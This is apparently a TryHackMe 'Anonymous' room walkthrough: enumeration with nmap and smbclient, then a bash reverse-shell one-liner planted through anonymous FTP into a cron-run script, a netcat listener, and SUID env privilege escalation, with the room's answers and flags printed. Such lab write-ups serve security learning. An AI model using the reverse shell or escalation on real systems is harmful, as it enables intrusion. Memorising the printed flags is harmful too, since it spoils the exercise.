Tryhackme — Anonymous
NMAP — Network mapper
#1 — Enumerate the machine. How many ports are open?
# nmap -sC -vv -A 10.10.138.102
Nmap scan:
ANSWER :- 4
#2 — What service is running on port 21?
ANSWER :- ftp
#3 — What service is running on ports 139 and 445?
ANSWER :- smb
#4 — There’s a share on the user’s computer. What’s it called?
#smbclient -L 10.10.138.102
ANSWER :- pics
#5 - user.txt
clean.sh
#!/bin/bash
bash -i >& /dev/tcp/10.8.192.14/4444 0>&1Connect to the FTP server again:
ftp 10.10.37.186
Anonymous
cd scripts
put clean.shNow set up a netcat listener on the specified port:
#nc — nvlp 4444
listening on [any] 4444 …
connect to [10.8.192.14] from (UNKNOWN) [10.10.138.102] 54700
bash: cannot set terminal process group (1399): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ ls
ls
pics
user.txt
namelessone@anonymous:~$ cat user.txt
cat user.txt
user flag — 90d6f992585815ff991e68748c414740
Privilege Escalation
I tried to check my privileges with sudo -l but as I don’t have the user’s password, it failed. Let’s check what programs are owned by root with the SUID bit set
sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries.
To get a list of all SUID binaries, execute the following command:
#find / -user root -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/env ← — here
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
GTFOBins (https://gtfobins.github.io/gtfobins/env/) reveals a potential privilege escalation:
namelessone@anonymous:~$ env /bin/sh -p
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
4d930091c31a622a7ed10f27999af363root flag — 4d930091c31a622a7ed10f27999af363
